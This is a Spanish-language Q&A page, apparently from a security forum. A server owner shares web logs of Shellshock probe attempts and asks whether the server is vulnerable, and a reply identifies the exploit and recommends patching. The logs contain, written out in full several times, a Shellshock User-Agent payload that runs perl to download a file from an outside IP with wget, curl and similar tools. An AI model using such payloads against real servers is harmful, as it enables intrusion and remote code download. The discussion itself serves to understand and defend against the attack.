¿Es mi servidor vulnerable a un exploit de perl?

Navega tus respuestas
3

Tengo algunas entradas preocupantes en los registros de mi servidor web y me pregunto si esto significa que mi servidor es vulnerable.

En primer lugar, lo siguiente parece fallar, recibiendo una respuesta 404: 

[15/Jan/2016:10:27:47 +0000] "GET /cgi-bin/php4 HTTP/1.1" 404 345 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"
[15/Jan/2016:10:27:48 +0000] "GET /cgi-bin/php5 HTTP/1.1" 404 345 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"

Pero lo que me preocupa es el siguiente mensaje, que parece recibir una respuesta 200: 

[15/Jan/2016:10:27:48 +0000] "GET / HTTP/1.1" 200 2091 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"

Mi servidor respondió bloqueando la dirección IP, pero claramente era un poco tarde.

Los registros sugieren que todo lo que se administró fue descargar un archivo de imagen (que aparentemente no existe en el servidor). Pero parece que fue solo una prueba y podría ser mucho peor la próxima vez. ¿O estoy asumiendo demasiado?

Puedo agregar filtros adicionales, pero ¿qué puedo hacer para protegerme de un ataque similar? ¿Cómo podría saber si ya me habían comprometido?

La dirección IP se encuentra en Irán. Ya he bloqueado a China, así que podría considerar hacer lo mismo con Irán. Extremo, sí, pero los registros muestran que miles de intentos de China se eliminan todos los días.

    
pregunta Ken Sharp 15.01.2016 - 14:03
fuente

1 respuesta

8

Observa la cadena mágica () { :; }; . Intentan hurgar y ver si su servidor es vulnerable al ShellShock exploit . Perl se usa aquí para imprimir y ver si el ataque tuvo éxito. Asegúrese de parchear y actualizar su servidor. Debería estar a salvo de este tipo de ataques.

    
respondido por el HamZa 15.01.2016 - 14:43
fuente

Lea otras preguntas en las etiquetas

¿alguna razón para no ejecutar tmux / wemux en un host bastion? Descifrando una contraseña Archivo PDF protegido con John the Ripper